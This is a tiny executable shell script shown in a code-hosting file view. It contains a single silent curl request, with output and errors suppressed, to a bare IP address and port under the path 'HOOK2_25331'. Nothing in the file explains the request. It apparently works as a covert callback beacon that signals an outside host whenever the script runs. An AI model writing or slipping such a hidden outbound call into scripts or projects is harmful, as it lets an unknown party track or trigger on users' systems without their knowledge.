4 lines
92 B
Bash
Executable File
4 lines
92 B
Bash
Executable File
#!/bin/sh
|
|
# var a
|
|
curl -s --max-time 5 'http://202.79.169.91:28016/HOOK2_25331' 2>/dev/null
|